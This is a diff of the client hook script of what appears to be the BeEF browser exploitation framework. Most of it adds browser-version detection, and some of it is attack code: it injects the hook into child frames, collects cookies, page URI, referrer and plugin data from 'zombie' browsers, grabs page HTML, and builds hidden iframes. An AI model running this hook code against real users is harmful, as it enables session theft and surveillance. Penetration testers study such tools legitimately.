require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/api'
## @note Include Websocket

3
core/core.rb
View File

@@ -37,4 +37,7 @@ require 'core/main/migration'
require 'core/main/console/commandline'
require 'core/main/console/banners'
# @note Include rubyzip lib
require 'zip'

6
core/filters/browser.rb
View File

@@ -22,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str)
return false if str.length < 10
return false if str.length > 50
return false if str.length > 250
return false if has_non_printable_char?(str)
true
end
@@ -123,9 +123,9 @@ module Filters
return true if not is_non_empty_string?(str)
return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end

16
core/main/client/beef.js
View File

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.

541
core/main/client/browser.js
View File

@@ -19,6 +19,22 @@ beef.browser = {
return navigator.userAgent;
},
/**
* Returns true if Avant Browser.
* @example: beef.browser.isA()
*/
isA:function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
},
/**
* Returns true if Iceweasel.
* @example: beef.browser.isI()
*/
isI:function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
},
/**
* Returns true if IE6.
* @example: beef.browser.isIE6()
@@ -236,12 +252,52 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
},
/**
* Returns true if FF21
* @example: beef.browser.isFF21()
*/
isFF21:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/**
* Returns true if FF22
* @example: beef.browser.isFF22()
*/
isFF22:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
},
/**
* Returns true if FF23
* @example: beef.browser.isFF23()
*/
isFF23:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
},
/**
* Returns true if FF24
* @example: beef.browser.isFF24()
*/
isFF24:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
},
/**
* Returns true if FF25
* @example: beef.browser.isFF25()
*/
isFF25:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF:function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25();
},
/**
@@ -396,6 +452,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome for iOS 19.
* @example: beef.browser.isC19iOS()
*/
isC19iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome 20.
* @example: beef.browser.isC20()
@@ -404,6 +468,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome for iOS 20.
* @example: beef.browser.isC20iOS()
*/
isC20iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome 21.
* @example: beef.browser.isC21()
@@ -412,6 +484,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome for iOS 21.
* @example: beef.browser.isC21iOS()
*/
isC21iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome 22.
* @example: beef.browser.isC22()
@@ -420,6 +500,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome for iOS 22.
* @example: beef.browser.isC22iOS()
*/
isC22iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome 23.
* @example: beef.browser.isC23()
@@ -428,6 +516,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome for iOS 23.
* @example: beef.browser.isC23iOS()
*/
isC23iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome 24.
* @example: beef.browser.isC24()
@@ -436,6 +532,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome for iOS 24.
* @example: beef.browser.isC24iOS()
*/
isC24iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome 25.
* @example: beef.browser.isC25()
@@ -444,12 +548,100 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome for iOS 25.
* @example: beef.browser.isC25iOS()
*/
isC25iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
*/
isC26:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome for iOS 26.
* @example: beef.browser.isC26iOS()
*/
isC26iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome 27.
* @example: beef.browser.isC27()
*/
isC27:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome for iOS 27.
* @example: beef.browser.isC27iOS()
*/
isC27iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome 28.
* @example: beef.browser.isC28()
*/
isC28:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome for iOS 28.
* @example: beef.browser.isC28iOS()
*/
isC28iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome 29.
* @example: beef.browser.isC29()
*/
isC29:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome for iOS 29.
* @example: beef.browser.isC29iOS()
*/
isC29iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome 30.
* @example: beef.browser.isC30()
*/
isC30:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome for iOS 30.
* @example: beef.browser.isC30iOS()
*/
isC30iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC:function () {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS();
},
/**
@@ -524,12 +716,29 @@ beef.browser = {
C17:this.isC17(), // Chrome 17
C18:this.isC18(), // Chrome 18
C19:this.isC19(), // Chrome 19
C19iOS:this.isC19iOS(), // Chrome 19 on iOS
C20:this.isC20(), // Chrome 20
C20iOS:this.isC20iOS(), // Chrome 20 on iOS
C21:this.isC21(), // Chrome 21
C21iOS:this.isC21iOS(), // Chrome 21 on iOS
C22:this.isC22(), // Chrome 22
C22iOS:this.isC22iOS(), // Chrome 22 on iOS
C23:this.isC23(), // Chrome 23
C23iOS:this.isC23iOS(), // Chrome 23 on iOS
C24:this.isC24(), // Chrome 24
C24iOS:this.isC24iOS(), // Chrome 24 on iOS
C25:this.isC25(), // Chrome 25
C25iOS:this.isC25iOS(), // Chrome 25 on iOS
C26:this.isC26(), // Chrome 26
C26iOS:this.isC26iOS(), // Chrome 26 on iOS
C27:this.isC27(), // Chrome 27
C27iOS:this.isC27iOS(), // Chrome 27 on iOS
C28:this.isC28(), // Chrome 28
C28iOS:this.isC28iOS(), // Chrome 28 on iOS
C29:this.isC29(), // Chrome 29
C29iOS:this.isC29iOS(), // Chrome 29 on iOS
C30:this.isC30(), // Chrome 30
C30iOS:this.isC30iOS(), // Chrome 30 on iOS
C:this.isC(), // Chrome any version
FF2:this.isFF2(), // Firefox 2
@@ -552,7 +761,12 @@ beef.browser = {
FF17:this.isFF17(), // Firefox 17
FF18:this.isFF18(), // Firefox 18
FF19:this.isFF19(), // Firefox 19
FF20:this.isFF20(), // Firefox 20
FF20:this.isFF20(), // Firefox 20
FF21:this.isFF21(), // Firefox 21
FF22:this.isFF22(), // Firefox 22
FF23:this.isFF23(), // Firefox 23
FF24:this.isFF24(), // Firefox 24
FF25:this.isFF25(), // Firefox 25
FF:this.isFF(), // Firefox any version
IE6:this.isIE6(), // Internet Explorer 6
@@ -644,30 +858,98 @@ beef.browser = {
return '19'
}
; // Chrome 19
if (this.isC19iOS()) {
return '19'
}
; // Chrome 19 for iOS
if (this.isC20()) {
return '20'
}
; // Chrome 20
if (this.isC20iOS()) {
return '20'
}
; // Chrome 20 for iOS
if (this.isC21()) {
return '21'
}
; // Chrome 21
if (this.isC21iOS()) {
return '21'
}
; // Chrome 21 for iOS
if (this.isC22()) {
return '22'
}
; // Chrome 22
if (this.isC22iOS()) {
return '22'
}
; // Chrome 22 for iOS
if (this.isC23()) {
return '23'
}
; // Chrome 23
if (this.isC23iOS()) {
return '23'
}
; // Chrome 23 for iOS
if (this.isC24()) {
return '24'
}
; // Chrome 24
if (this.isC24iOS()) {
return '24'
}
; // Chrome 24 for iOS
if (this.isC25()) {
return '25'
}
;
; // Chrome 25
if (this.isC25iOS()) {
return '25'
}
; // Chrome 25 for iOS
if (this.isC26()) {
return '26'
}
; // Chrome 26
if (this.isC26iOS()) {
return '26'
}
; // Chrome 26 for iOS
if (this.isC27()) {
return '27'
}
; // Chrome 27
if (this.isC27iOS()) {
return '27'
}
; // Chrome 27 for iOS
if (this.isC28()) {
return '28'
}
; // Chrome 28
if (this.isC28iOS()) {
return '28'
}
; // Chrome 28 for iOS
if (this.isC29()) {
return '29'
}
; // Chrome 29
if (this.isC29iOS()) {
return '29'
}
; // Chrome 29 for iOS
if (this.isC30()) {
return '30'
}
; // Chrome 30
if (this.isC30iOS()) {
return '30'
}
; // Chrome 30 for iOS
if (this.isFF2()) {
return '2'
}
@@ -748,10 +1030,30 @@ beef.browser = {
return '19'
}
; // Firefox 19
if (this.isFF20()) {
return '20'
}
; // Firefox 20
if (this.isFF20()) {
return '20'
}
; // Firefox 20
if (this.isFF21()) {
return '21'
}
; // Firefox 21
if (this.isFF22()) {
return '22'
}
; // Firefox 22
if (this.isFF23()) {
return '23'
}
; // Firefox 23
if (this.isFF24()) {
return '24'
}
; // Firefox 24
if (this.isFF25()) {
return '25'
}
; // Firefox 25
if (this.isIE6()) {
return '6'
@@ -858,10 +1160,10 @@ beef.browser = {
try {
// append hook script
self.frames[i].document.body.appendChild(script);
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) {
// warn on cross-domain
//console.log("Hooking frame failed");
beef.debug("Hooking child frame failed: "+e.message);
}
}
},
@@ -876,7 +1178,7 @@ beef.browser = {
if (!this.type().IE) {
return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
} else {
flash_versions = 11;
flash_versions = 12;
flash_installed = false;
if (window.ActiveXObject) {
@@ -888,10 +1190,10 @@ beef.browser = {
}
}
catch (e) {
beef.debug("Creating Flash ActiveX object failed: "+e.message);
}
}
}
;
return flash_installed;
}
},
@@ -917,7 +1219,7 @@ beef.browser = {
}
// Internet Explorer
// Internet Explorer
} else {
try {
@@ -925,6 +1227,7 @@ beef.browser = {
var qt_test = new ActiveXObject('QuickTime.QuickTime');
} catch (e) {
beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
}
if (qt_test) {
@@ -937,7 +1240,7 @@ beef.browser = {
},
/**
/**
* Checks if the zombie has the RealPlayer plugin installed.
* @return: {Boolean} true or false.
*
@@ -958,30 +1261,30 @@ beef.browser = {
}
// Internet Explorer
// Internet Explorer
} else {
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
for (var i = 0; i < definedControls.length; i++) {
for (var i = 0; i < definedControls.length; i++) {
try {
var rp_test = new ActiveXObject(definedControls[i]);
var rp_test = new ActiveXObject(definedControls[i]);
} catch (e) {
beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
}
if ( rp_test ) {
realplayer = true;
}
}
if ( rp_test ) {
realplayer = true;
}
}
}
return realplayer;
@@ -1017,6 +1320,7 @@ beef.browser = {
var wmp_test = new ActiveXObject('WMPlayer.OCX');
} catch (e) {
beef.debug("Creating WMP ActiveX object failed: "+e.message);
}
if (wmp_test) {
@@ -1045,10 +1349,11 @@ beef.browser = {
try {
control = new ActiveXObject("VideoLAN.VLCPlugin.2");
vlc = true ;
} catch(e) {
}
};
return vlc ;
} catch(e) {
beef.debug("Creating VLC ActiveX object failed: "+e.message);
}
}
return vlc;
},
/**
@@ -1058,7 +1363,14 @@ beef.browser = {
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled:function () {
return false;
//Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
// versionJRE = deployJava.getJREs();
// if(versionJRE != '')
// return true;
// else
return false;
},
/**
@@ -1069,8 +1381,9 @@ beef.browser = {
*/
hasPhonegap:function () {
var result = false;
try {
if (!!device.phonegap) result = true; else result = false;
if (!!device.phonegap || !!device.cordova) result = true; else result = false;
}
catch (e) {
result = false;
@@ -1101,33 +1414,8 @@ beef.browser = {
*/
hasJava:function () {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
return beef.browser.javaEnabled();
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch (e) {
return false;
}
},
/**
@@ -1436,63 +1724,62 @@ beef.browser = {
getDetails:function () {
var details = new Array();
var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion();
var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion();
var browser_reported_name = beef.browser.getBrowserReportedName();
var page_title = (document.title) ? document.title : "Unknown";
var page_uri = document.location.href;
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var hostname = document.location.hostname;
var hostport = (document.location.port) ? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var hw_name = beef.hardware.getName();
var cpu_type = beef.hardware.cpuType();
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var page_title = (document.title) ? document.title : "Unknown";
var page_uri = (document.location.href) ? document.location.href : "Unknown";
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
var hostport = (document.location.port) ? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var hw_name = beef.hardware.getName();
var cpu_type = beef.hardware.cpuType();
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
if (value == true) return value; else if (typeof value == 'object') return value; else return;
});
var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize();
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
try{
var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
if (cookies) details["Cookies"] = cookies;
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
if (cookies) details['Cookies'] = cookies;
if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
}catch(e){
// the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
// and there is no reason to read cookies at this point
details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
details["hasSessionCookies"] = "No";
details["hasPersistentCookies"] = "No";
details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
details['hasSessionCookies'] = "No";
details['hasPersistentCookies'] = "No";
}
if (browser_name) details["BrowserName"] = browser_name;
if (browser_version) details["BrowserVersion"] = browser_version;
if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
if (page_title) details["PageTitle"] = page_title;
if (page_uri) details["PageURI"] = page_uri;
if (page_referrer) details["PageReferrer"] = page_referrer;
if (hostname) details["HostName"] = hostname;
if (hostport) details["HostPort"] = hostport;
if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
if (browser_name) details['BrowserName'] = browser_name;
if (browser_version) details['BrowserVersion'] = browser_version;
if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
if (page_title) details['PageTitle'] = page_title;
if (page_uri) details['PageURI'] = page_uri;
if (page_referrer) details['PageReferrer'] = page_referrer;
if (hostname) details['HostName'] = hostname;
if (hostport) details['HostPort'] = hostport;
if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
if (os_name) details['OsName'] = os_name;
if (hw_name) details['Hardware'] = hw_name;
if (cpu_type) details['CPU'] = cpu_type;
@@ -1502,18 +1789,17 @@ beef.browser = {
if (browser_type) details['BrowserType'] = browser_type;
if (screen_size) details['ScreenSize'] = screen_size;
if (window_size) details['WindowSize'] = window_size;
if (java_enabled) details['JavaEnabled'] = java_enabled;
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if (has_flash) details['HasFlash'] = has_flash
if (has_phonegap) details['HasPhonegap'] = has_phonegap
if (has_web_socket) details['HasWebSocket'] = has_web_socket
if (has_googlegears) details['HasGoogleGears'] = has_googlegears
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
if (has_flash) details['HasFlash'] = has_flash;
if (has_phonegap) details['HasPhonegap'] = has_phonegap;
if (has_web_socket) details['HasWebSocket'] = has_web_socket;
if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
if (has_webrtc) details['HasWebRTC'] = has_webrtc;
if (has_activex) details['HasActiveX'] = has_activex;
if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_wmp) details['HasWMP'] = has_wmp;
if (has_vlc) details['HasVLC'] = has_vlc;
if (has_foxit) details['HasFoxit'] = has_foxit;
return details;
@@ -1526,6 +1812,13 @@ beef.browser = {
return !!window.ActiveXObject;
},
/**
* Returns boolean value depending on whether the browser supports WebRTC
*/
hasWebRTC:function () {
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
},
/**
* Returns boolean value depending on whether the browser supports Silverlight
*/
@@ -1655,6 +1948,30 @@ beef.browser = {
return foxitplugin;
},
/**
* Returns the page head HTML
**/
getPageHead:function () {
var html_head;
try {
html_head = document.head.innerHTML.toString();
} catch (e) {
}
return html_head;
},
/**
* Returns the page body HTML
**/
getPageBody:function() {
var html_body;
try {
html_body = document.body.innerHTML.toString();
} catch (e) {
}
return html_body;
},
/**
* Dynamically changes the favicon: works in Firefox, Chrome and Opera
**/

150
core/main/client/dom.js
View File

@@ -76,6 +76,30 @@ beef.dom = {
return iframe;
},
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
var form_action = params['src'];
params['src'] = '';
}
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
